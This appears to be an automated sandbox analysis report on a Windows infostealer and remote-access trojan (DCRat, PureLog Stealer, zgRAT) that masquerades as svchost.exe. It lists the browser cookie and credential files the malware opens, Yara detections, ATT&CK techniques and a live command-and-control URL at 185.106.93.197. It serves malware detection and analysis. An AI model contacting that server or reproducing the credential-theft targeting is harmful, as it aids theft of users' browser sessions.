Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\Local Settings\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Network\Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior
Source: C:\comref\svchost.exe	File opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies	Jump to behavior

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 0000000E.00000002.3783847798.0000000012AD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3698250628.0000000007095000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3698250628.00000000029D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 4340, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: ugRGgCJhQl.exe, type: SAMPLE
Source: Yara match	File source: 0.3.ugRGgCJhQl.exe.69ee6cb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ugRGgCJhQl.exe.60de6cb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.svchost.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ugRGgCJhQl.exe.60de6cb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000000.1292145325.0000000000232000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1235344386.00000000069A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1234987945.0000000006090000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\comref\svchost.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match	File source: ugRGgCJhQl.exe, type: SAMPLE
Source: Yara match	File source: 0.3.ugRGgCJhQl.exe.69ee6cb.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ugRGgCJhQl.exe.60de6cb.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.0.svchost.exe.230000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.ugRGgCJhQl.exe.60de6cb.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\comref\svchost.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	141 Windows Management Instrumentation	11 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	112 Process Injection	11 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	157 System Information Discovery	SMB/Windows Admin Shares	1 Clipboard Data	11 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Software Packing	NTDS	361 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	111 Masquerading	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	251 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	112 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ugRGgCJhQl.exe	56%	Virustotal		Browse
ugRGgCJhQl.exe	79%	ReversingLabs	Win32.Trojan.Uztuby
ugRGgCJhQl.exe	100%	Avira	VBS/Runner.VPG
ugRGgCJhQl.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Desktop\eVuUdNSS.log	100%	Avira	TR/PSW.Agent.qngqt
C:\Users\user\Desktop\ThQetCXk.log	100%	Avira	HEUR/AGEN.1300079
C:\comref\POAHIjOuJ41OH.vbe	100%	Avira	VBS/Runner.VPG
C:\comref\svchost.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\Desktop\eVuUdNSS.log	100%	Joe Sandbox ML
C:\comref\svchost.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\ApTjSBhc.log	17%	ReversingLabs
C:\Users\user\Desktop\ApTjSBhc.log	14%	Virustotal		Browse
C:\Users\user\Desktop\LMrHnriI.log	29%	ReversingLabs
C:\Users\user\Desktop\LMrHnriI.log	29%	Virustotal		Browse
C:\Users\user\Desktop\ThQetCXk.log	17%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\ThQetCXk.log	22%	Virustotal		Browse
C:\Users\user\Desktop\eVuUdNSS.log	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\Users\user\Desktop\eVuUdNSS.log	69%	Virustotal		Browse
C:\Users\user\Desktop\jIMTFKhG.log	29%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\jIMTFKhG.log	27%	Virustotal		Browse
C:\comref\svchost.exe	71%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat
C:\comref\svchost.exe	75%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://185.106.93.197/phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/Pro	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://185.106.93.197	0%	Avira URL Cloud	safe
http://185.106.93.197/phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php	100%	Avira URL Cloud	malware
http://185.106H	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
http://185.106.93.197/phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php	3%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://185.106.93.197/phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/Pro	3%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://185.106.93.197	4%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://185.106.93.197/phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/ProcessGame2/httplowjsExternal/6Public42/HttpTrafficPacket/0/PhpjavascriptjsdleUploadsdownloads.php	true	3%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015997000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013D3E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013D3E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013D3E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.106.93.197/phpHttp3/3JsProviderRequest/Game/Default6/Better/8Windows28/privateTo/Line/Pro	svchost.exe, 0000000E.00000002.3698250628.00000000029D9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000007095000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000006FCA000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.000000000707F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000004FAF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3698250628.0000000006DC3000.00000004.00000800.00020000.00000000.sdmp	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	svchost.exe, 0000000E.00000002.3783847798.0000000014733000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001515F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014030000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014AEB000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014197000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001293F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013EC9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014B82000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015EB3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000012F9B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015B7D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013B85000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015010000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000015997000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.000000001306B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000014664000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000157AE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013820000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.00000000158FD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3783847798.0000000013269000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
